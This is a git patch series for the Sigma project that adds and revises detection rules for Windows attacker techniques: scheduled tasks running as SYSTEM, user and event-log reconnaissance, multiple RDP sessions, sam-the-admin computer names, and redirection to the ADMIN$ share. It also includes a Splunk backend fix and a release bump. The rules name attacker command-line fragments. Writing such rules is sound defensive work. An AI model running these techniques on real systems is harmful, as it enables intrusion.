+related: + - id: 7a02e22e-b885-4404-b38b-1ddc7e65258a + type: similar +description: Detects scheduled task creations or modification on a suspicious schedule type status: experimental references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html tags: - attack.execution - attack.t1053.005 author: Nasreddine Bencherchali -date: 2022/08/31 +date: 2022/09/09 logsource: product: windows category: process_creation @@ -23,12 +27,12 @@ detection: - ' ONSTART ' - ' ONCE ' - ' ONIDLE ' - selection_privs: + filter_privs: CommandLine|contains: - 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space - 'HIGHEST' - condition: all of selection_* + condition: all of selection_* and not 1 of filter_* falsepositives: - - Unknown + - Legitmate processes that run at logon. Filter according to your environment level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml new file mode 100644 index 000000000..b2fc3c9a1 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type_system.yml @@ -0,0 +1,37 @@ +title: Suspicious Schtasks Schedule Type With High Privileges +id: 7a02e22e-b885-4404-b38b-1ddc7e65258a +related: + - id: 24c8392b-aa3c-46b7-a545-43f71657fe98 + type: similar +description: Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type +status: experimental +references: + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change + - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create +tags: + - attack.execution + - attack.t1053.005 +author: Nasreddine Bencherchali +date: 2022/08/31 +logsource: + product: windows + category: process_creation +detection: + selection_img: + - Image|endswith: '\schtasks.exe' + - OriginalFileName: 'schtasks.exe' + selection_time: + CommandLine|contains: + - ' ONLOGON ' + - ' ONSTART ' + - ' ONCE ' + - ' ONIDLE ' + selection_privs: + CommandLine|contains: + - 'NT AUT' # This covers the usual NT AUTHORITY\SYSTEM + - ' SYSTEM' # SYSTEM is a valid value for schtasks hence it gets it's own value with space + - 'HIGHEST' + condition: all of selection_* +falsepositives: + - Some installers were seen using this method of creation unfortunately. Filter them in your environment +level: high diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml new file mode 100644 index 000000000..4e91b6925 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml @@ -0,0 +1,30 @@ +title: User Discovery Via Get-ADUser Cmdlet +id: c2993223-6da8-4b1a-88ee-668b8bf315e9 +status: experimental +description: Detects usage of the Get-ADUser cmdlet to collect user information +author: Nasreddine Bencherchali +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +date: 2022/09/09 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Image|endswith: + - '\powershell.exe' + - '\pwsh.exe' + - OriginalFileName: + - 'PowerShell.EXE' + - 'pwsh.dll' + selection_cli: + CommandLine|contains|all: + - 'Get-ADUser ' + - ' -Filter \*' + condition: all of selection +falsepositives: + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often +level: high +tags: + - attack.discovery + - attack.t1033 diff --git a/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml new file mode 100644 index 000000000..021e770a3 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml @@ -0,0 +1,28 @@ +title: Wevtutil Recon +id: beaa66d6-aa1b-4e3c-80f5-e0145369bfaf +status: experimental +description: Detects usage of the wevtutil utility to perform reconnaissance +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +author: Nasreddine Bencherchali +date: 2022/09/09 +tags: + - attack.discovery +logsource: + category: process_creation + product: windows +detection: + selection_cli: + Image|endswith: '\wevtutil.exe' + CommandLine|contains: + - ' qe ' + - ' query-events ' + selection_logs: + CommandLine|contains: + # Add more event log channels that are interesting for attackers + - 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational' + - 'Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational' + condition: all of selection_* +falsepositives: + - Legitmate usage of the utility by administrators to query the event log +level: medium diff --git a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml index 0e70d3dfd..c275f908c 100644 --- a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml +++ b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml @@ -16,7 +16,7 @@ logsource: category: registry_event detection: selection: - TargetObject|contains|all: + TargetObject|contains|all: - 'SYSTEM\' - 'ControlSet' - '\Control\Lsa' @@ -27,4 +27,4 @@ detection: condition: selection falsepositives: - Unknown -level: high \ No newline at end of file +level: high diff --git a/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml b/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml index b7cf6a8f1..5e3e00f86 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml @@ -3,7 +3,7 @@ id: 5de03871-5d46-4539-a82d-3aa992a69a83 description: Detects the modification of the registry to disable a system restore on the computer author: frack113 date: 2022/04/04 -modified: 2022/06/26 +modified: 2022/09/09 status: experimental references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry @@ -13,9 +13,9 @@ logsource: detection: selection: EventType: Setvalue - TargetObject|startswith: - - 'HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore' - - 'HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore' + TargetObject|contains: + - '\Policies\Microsoft\Windows NT\SystemRestore' + - '\Microsoft\Windows NT\CurrentVersion\SystemRestore' TargetObject|endswith: - DisableConfig - DisableSR diff --git a/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml b/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml index 3c0451ff3..5fe588e2a 100644 --- a/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml +++ b/rules/windows/registry/registry_set/registry_set_enabling_turnoffcheck.yml @@ -2,6 +2,7 @@ title: Scripted Diagnostics Turn Off Check Enabled - Registry id: 7d995e63-ec83-4aa3-89d5-8a17b5c87c86 description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability date: 2022/06/15 +modified: 2022/09/09 author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io' references: - https://twitter.com/wdormann/status/1537075968568877057?s=20&t=0lr18OAnmAGoGpma6grLUw @@ -12,7 +13,7 @@ logsource: detection: selection: EventType: SetValue - TargetObject: 'HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck' + TargetObject|endswith: '\Policies\Microsoft\Windows\ScriptedDiagnostics\TurnOffCheck' Details: 'DWORD (0x00000001)' condition: selection falsepositives: diff --git a/rules/windows/registry/registry_set/registry_set_hide_function_user.yml b/rules/windows/registry/registry_set/registry_set_hide_function_user.yml index 684ed8672..d96729b30 100644 --- a/rules/windows/registry/registry_set/registry_set_hide_function_user.yml +++ b/rules/windows/registry/registry_set/registry_set_hide_function_user.yml @@ -18,7 +18,7 @@ detection: - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth' - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCANetwork' - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAPower' - - 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAVolume' + - 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAVolume' Details: 'DWORD (0x00000001)' selection_set_0: EventType: SetValue diff --git a/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml index 74a990b86..8da757bce 100644 --- a/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml +++ b/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml @@ -21,7 +21,7 @@ detection: - '\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\' - '\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates\' - '\SOFTWARE\Microsoft\EnterpriseCertificates\CA\Certificates\' - - '\Software\Microsoft\SystemCertificates\AuthRoot\Certificates\' + - '\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\' - '\SOFTWARE\Policies\Microsoft\SystemCertificates\AuthRoot\Certificates\' - '\SOFTWARE\Microsoft\EnterpriseCertificates\AuthRoot\Certificates\' TargetObject|endswith: '\Blob' diff --git a/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml new file mode 100644 index 000000000..4fb70441a --- /dev/null +++ b/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml @@ -0,0 +1,22 @@ +title: Winlogon AllowMultipleTSSessions Enable +id: f7997770-92c3-4ec9-b112-774c4ef96f96 +description: Detects when the 'AllowMultipleTSSessions' value is enabled. Which allows for multiple Remote Desktop connection sessions to be opened at once. This is often used by attacker as a way to connect to an RDP session without disconnecting the other users +author: Nasreddine Bencherchali +date: 2022/09/09 +status: experimental +references: + - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html +logsource: + category: registry_set + product: windows +detection: + selection: + EventType: SetValue + TargetObject|endswith: '\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions' + Details|endswith: DWORD (0x00000001) + condition: selection +falsepositives: + - Legitmate use of the multi session functionality +level: medium +tags: + - attack.persistence From c8fc1cf21e6a991cb32da1f05a899ed63ccd8eae Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:04:36 +0200 Subject: [PATCH 49/73] Update proc_creation_win_user_discovery_get_aduser.yml --- .../proc_creation_win_user_discovery_get_aduser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml index 4e91b6925..6e5505cdf 100644 --- a/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml +++ b/rules/windows/process_creation/proc_creation_win_user_discovery_get_aduser.yml @@ -21,7 +21,7 @@ detection: CommandLine|contains|all: - 'Get-ADUser ' - ' -Filter \*' - condition: all of selection + condition: all of selection_* falsepositives: - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: high From 051397b533b3a0f8e01c836319ca6b47c63ff915 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:10:49 +0200 Subject: [PATCH 50/73] Update proc_creation_win_susp_schtasks_delete_all.yml --- .../proc_creation_win_susp_schtasks_delete_all.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml index 28aefc946..f36952ecd 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_schtasks_delete_all.yml @@ -14,7 +14,7 @@ detection: Image|endswith: '\schtasks.exe' CommandLine|contains|all: - ' /delete ' - - '/tn *' + - '/tn \*' - ' /f' condition: selection falsepositives: From b75fb5abf5efa9601bf5c02577f7433dfbca5767 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 15:12:47 +0200 Subject: [PATCH 51/73] Renamed suspicious in rules file names to susp --- ...uspicious_psexesvc.yml => proc_creation_win_susp_psexesvc.yml} | 0 ...s_system.yml => proc_creation_win_susp_psexesvc_as_system.yml} | 0 ...vc_renamed.yml => proc_creation_win_susp_psexesvc_renamed.yml} | 0 3 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc.yml => proc_creation_win_susp_psexesvc.yml} (100%) rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc_as_system.yml => proc_creation_win_susp_psexesvc_as_system.yml} (100%) rename rules/windows/process_creation/{proc_creation_win_suspicious_psexesvc_renamed.yml => proc_creation_win_susp_psexesvc_renamed.yml} (100%) diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml similarity index 100% rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc.yml rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_as_system.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml similarity index 100% rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_as_system.yml rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml diff --git a/rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_renamed.yml b/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml similarity index 100% rename from rules/windows/process_creation/proc_creation_win_suspicious_psexesvc_renamed.yml rename to rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml From a71ce185d791427a2b29d66a4cb5b83b5c6619e4 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:32:03 +0200 Subject: [PATCH 52/73] Fix --- .../proc_creation_win_apt_hurricane_panda.yml | 2 +- ...reation_win_redirect_local_admin_share.yml | 29 +++++++++---------- ...ation_win_susp_redir_local_admin_share.yml | 21 -------------- 3 files changed, 14 insertions(+), 38 deletions(-) delete mode 100644 rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml index 5859e1083..2f51e4fc7 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml @@ -15,7 +15,7 @@ detection: - CommandLine|contains|all: - 'localgroup' - 'admin' - - '' + - '/add' - CommandLine|contains: - '\Win64.exe' condition: selection diff --git a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml index bbb5763ce..31b705f94 100644 --- a/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml +++ b/rules/windows/process_creation/proc_creation_win_redirect_local_admin_share.yml @@ -1,26 +1,23 @@ -title: Suspicious Redirect To Local Admin Share -id: 77d570aa-4e72-4949-98ff-24cdeec16787 +title: Suspicious Redirection to Local Admin Share +id: ab9e3b40-0c85-4ba1-aede-455d226fd124 status: experimental -description: Detects output redirection to the local admin share (ADMIN$) via the commandline -author: Nasreddine Bencherchali +description: Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers +author: Florian Roth +date: 2022/01/16 +modified: 2022/09/09 references: + - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -date: 2022/09/09 -tags: - - attack.execution - - attack.lateral_movement - - attack.t1021.001 logsource: category: process_creation product: windows detection: - selection: - CommandLine|contains: - - ' 1 > \\\\127.0.0.1\ADMIN$\' - - ' 1> \\\\127.0.0.1\ADMIN$\' - - ' 1 >\\\\127.0.0.1\ADMIN$\' - - ' 1>\\\\127.0.0.1\ADMIN$\' - condition: selection + selection_redirect: + CommandLine|contains: '>' + selection_share: + - '\\\\127.0.0.1\\admin$\\' + - '\\\\localhost\\admin$\\' + condition: all of selection_* falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml b/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml deleted file mode 100644 index 040477109..000000000 --- a/rules/windows/process_creation/proc_creation_win_susp_redir_local_admin_share.yml +++ /dev/null @@ -1,21 +0,0 @@ -title: Suspicious Redirection to Local Admin Share -id: ab9e3b40-0c85-4ba1-aede-455d226fd124 -status: experimental -description: Detects a suspicious output redirection to the local admins share as often found in malicious scripts or hacktool stagers -author: Florian Roth -date: 2022/01/16 -modified: 2022/02/01 -references: - - https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/ -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - '> \\\\127.0.0.1\\admin$' - - '> \\\\localhost\\admin$' - condition: selection -falsepositives: - - Unknown -level: high From 14db9c9fb18d703769779d06f9258b6cfda049d6 Mon Sep 17 00:00:00 2001 From: "nasreddine.bencherchali@nextron-systems.com" <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 15:43:07 +0200 Subject: [PATCH 53/73] Update proc_creation_win_wmic_computersystem_recon.yml --- .../proc_creation_win_wmic_computersystem_recon.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml index a78ba6588..645bf62ec 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml @@ -1,5 +1,5 @@ title: Suspicious Get Local Groups Information with WMIC -id: 164eda96-11b2-430b-85ff-6a265c15bf32 +id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f status: experimental description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model...etc. references: From b170af5687aab9765306ec73efb0c22d4761522d Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:08:19 +0200 Subject: [PATCH 54/73] Added rule for sam the admin suspicious computer --- .../security/win_susp_computer_name.yml | 35 +++++++++++++++++++ .../file_change_win_2022_timestomping.yml | 4 +-- 2 files changed, 37 insertions(+), 2 deletions(-) create mode 100644 rules/windows/builtin/security/win_susp_computer_name.yml diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml new file mode 100644 index 000000000..e85500077 --- /dev/null +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -0,0 +1,35 @@ +title: Win Susp Computer Name containing samtheadmin +id: 39698b3f-da92-4bc6-bfb5-645a98386e45 +status: experimental +description: Detects suspicious computer name +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1511760068743766026 + - https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py + - https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py +tags: + - cve.2021.42278 + - cve.2021.42287 + - attack.persistence + - attack.privilege_escalation + - attack.t1078 +logsource: + category: security + product: windows +detection: + selection1: + SamAccountName|startswith: 'SAMTHEADMIN-' + SamAccountName|endswith: '$' + selection2: + TargetUserName|startswith: 'SAMTHEADMIN-' + TargetUserName|endswith: '$' + condition: 1 of selection* + fields: + - EventID + - SamAccountName + - SubjectUserName + - TargetUserName +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index cfdf05658..0a2643eaf 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/05 +modified: 2022/09/09 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* + condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From 9a77542bc6dc85805ab10e7cc6ee9500f09ff9e4 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:11:07 +0200 Subject: [PATCH 55/73] Add comment to explain lack of eventID\nBetter description --- rules/windows/builtin/security/win_susp_computer_name.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml index e85500077..f28ddfb24 100644 --- a/rules/windows/builtin/security/win_susp_computer_name.yml +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -1,7 +1,7 @@ title: Win Susp Computer Name containing samtheadmin id: 39698b3f-da92-4bc6-bfb5-645a98386e45 status: experimental -description: Detects suspicious computer name +description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool author: elhoim date: 2022/09/09 references: @@ -18,6 +18,7 @@ logsource: category: security product: windows detection: + # Not adding an EventID on purpose to try to match on any event in security (including use of account), not just 4741 (computer account created) selection1: SamAccountName|startswith: 'SAMTHEADMIN-' SamAccountName|endswith: '$' From 6182b43279f7346250c68d5b0137833c04a5a22f Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:40:17 +0200 Subject: [PATCH 56/73] Add rule for renamed vmnat.exe --- .../proc_creation_win_renamed_vmnat.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml diff --git a/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml new file mode 100644 index 000000000..d7f2d8be8 --- /dev/null +++ b/rules/windows/process_creation/proc_creation_win_renamed_vmnat.yml @@ -0,0 +1,23 @@ +title: Proc Creation Win Renamed Vmnat.exe +id: 7b4f794b-590a-4ad4-ba18-7964a2832205 +status: experimental +description: Detects renamed vmnat.exe (Legitimate file from VMware workstation) for DLL side-loading +author: elhoim +date: 2022/09/09 +references: + - https://twitter.com/malmoeb/status/1525901219247845376 +tags: + - attack.defense_evasion + - attack.t1574.002 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: 'vmnat.exe' + filter: + Image|endswith: 'vmnat.exe' + condition: selection and not filter +falsepositives: + - Unknown +level: high From 6c1761a7b742cd7fcbde5dc2cfd92db6ebefe062 Mon Sep 17 00:00:00 2001 From: David ANDRE Date: Fri, 9 Sep 2022 16:12:59 +0200 Subject: [PATCH 57/73] Revert "Merge branch 'master' of github.com:elhoim/sigma" This reverts commit fc98278b194aba57181ee70cfb17f522906a55ea. --- .../windows/file_change/file_change_win_2022_timestomping.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/file_change/file_change_win_2022_timestomping.yml b/rules/windows/file_change/file_change_win_2022_timestomping.yml index 0a2643eaf..cfdf05658 100644 --- a/rules/windows/file_change/file_change_win_2022_timestomping.yml +++ b/rules/windows/file_change/file_change_win_2022_timestomping.yml @@ -8,7 +8,7 @@ references: - https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html author: frack113, Florian Roth date: 2022/08/12 -modified: 2022/09/09 +modified: 2022/09/05 tags: - attack.t1070.006 - attack.defense_evasion @@ -33,7 +33,7 @@ detection: - TargetFilename|endswith: - '.tmp' - '.temp' - condition: (( selection1 and not filter1 ) or ( selection2 and not filter2 )) and not 1 of gen_filter* + condition: ( selection1 and not filter1 ) or ( selection2 and not filter2 ) and not 1 of gen_filter* falsepositives: - Changes made to or by the local NTP service level: high From b9cc206d9d67c7a9a4be66cf605cf8f1d04a8d93 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 9 Sep 2022 18:53:48 +0200 Subject: [PATCH 58/73] Update win_susp_computer_name.yml --- .../builtin/security/win_susp_computer_name.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/builtin/security/win_susp_computer_name.yml b/rules/windows/builtin/security/win_susp_computer_name.yml index f28ddfb24..285be837e 100644 --- a/rules/windows/builtin/security/win_susp_computer_name.yml +++ b/rules/windows/builtin/security/win_susp_computer_name.yml @@ -1,4 +1,4 @@ -title: Win Susp Computer Name containing samtheadmin +title: Win Susp Computer Name Containing Samtheadmin id: 39698b3f-da92-4bc6-bfb5-645a98386e45 status: experimental description: Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool @@ -26,11 +26,11 @@ detection: TargetUserName|startswith: 'SAMTHEADMIN-' TargetUserName|endswith: '$' condition: 1 of selection* - fields: - - EventID - - SamAccountName - - SubjectUserName - - TargetUserName +fields: + - EventID + - SamAccountName + - SubjectUserName + - TargetUserName falsepositives: - - Unknown + - Unknown level: critical From 3396414bdab26b35ea960e806f39fb18f2edc667 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Fri, 9 Sep 2022 22:26:13 +0200 Subject: [PATCH 59/73] Revert "Wrapped all-modifier result into NodeSubexpression" This reverts commit 1fbd2bba4dcddfa0223a1d34dea893be6d3f9913. --- tools/sigma/parser/modifiers/transform.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/parser/modifiers/transform.py b/tools/sigma/parser/modifiers/transform.py index b66eaf9c9..8a5267999 100644 --- a/tools/sigma/parser/modifiers/transform.py +++ b/tools/sigma/parser/modifiers/transform.py @@ -72,7 +72,7 @@ class SigmaAllValuesModifier(SigmaTransformModifier): cond = ConditionAND() for val in self.value: cond.add(val) - return NodeSubexpression(cond) + return cond class SigmaBase64Modifier(ListOrStringModifierMixin, SigmaTransformModifier): """Encode strings with Base64""" From 7afcf24d21121ed5e00f570f0999b8d2466f7e79 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Fri, 9 Sep 2022 22:30:00 +0200 Subject: [PATCH 60/73] Splunk puts AND always into parentheses New fix for issue #3443 --- tools/sigma/backends/splunk.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tools/sigma/backends/splunk.py b/tools/sigma/backends/splunk.py index ca294f5c3..7d8ef1eb5 100644 --- a/tools/sigma/backends/splunk.py +++ b/tools/sigma/backends/splunk.py @@ -48,6 +48,9 @@ class SplunkBackend(SingleTextQueryBackend): raise TypeError("List values must be strings or numbers") return "(" + (" OR ".join(['%s=%s' % (key, self.generateValueNode(item)) for item in value])) + ")" + def generateANDNode(self, node): + return "(" + super().generateANDNode(node) + ")" + def generateAggregation(self, agg): if agg == None: return "" From c6e633bf30cc294092299fecc375328bf8f83111 Mon Sep 17 00:00:00 2001 From: Thomas Patzke Date: Fri, 9 Sep 2022 22:48:08 +0200 Subject: [PATCH 61/73] Release 0.22.1 --- CHANGELOG.md | 8 ++++++++ tools/setup.py | 2 +- 2 files changed, 9 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index f5c1ee9e5..2b267dfec 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -6,6 +6,14 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html) from version 0.14.0. +## 0.22.1 - 2022-09-09 + +### Fixed + +* Replaced generic fix for Splunk AND/OR precedence issue with a specific one because the initial fix broke too many + backends. Splunk queries now have generally parentheses around AND expressions, sometimes more. Use sigma-cli/pySigma + for cleaner Splunk queries. + ## 0.22 - 2022-09-08 ### Added diff --git a/tools/setup.py b/tools/setup.py index efeceb551..c70d80d28 100644 --- a/tools/setup.py +++ b/tools/setup.py @@ -14,7 +14,7 @@ with open(path.join(here, 'LONG_DESCRIPTION.md'), encoding='utf-8') as f: setup( name='sigmatools', - version='0.22.0', + version='0.22.1', description='Tools for the Generic Signature Format for SIEM Systems', long_description=long_description, long_description_content_type="text/markdown", From 2552b75e72b71bd05cd7a9b8298525c079d784ac Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Fri, 9 Sep 2022 23:11:28 +0200 Subject: [PATCH 62/73] Delete proc_creation_win_net_add_local_user.yml --- .../proc_creation_win_net_add_local_user.yml | 26 ------------------- 1 file changed, 26 deletions(-) delete mode 100644 rules/windows/process_creation/proc_creation_win_net_add_local_user.yml diff --git a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml b/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml deleted file mode 100644 index d7cc1ee7b..000000000 --- a/rules/windows/process_creation/proc_creation_win_net_add_local_user.yml +++ /dev/null @@ -1,26 +0,0 @@ -title: Net User Add Local User -id: 57ea3cf7-f2bf-419f-b51e-6a60635ebf0d -status: stable -description: Detects attempts to add new local user -references: - - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html -author: Nasreddine Bencherchali -date: 2022/09/09 -tags: - - attack.persistence - - attack.t1136.001 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: - - '\net.exe' - - 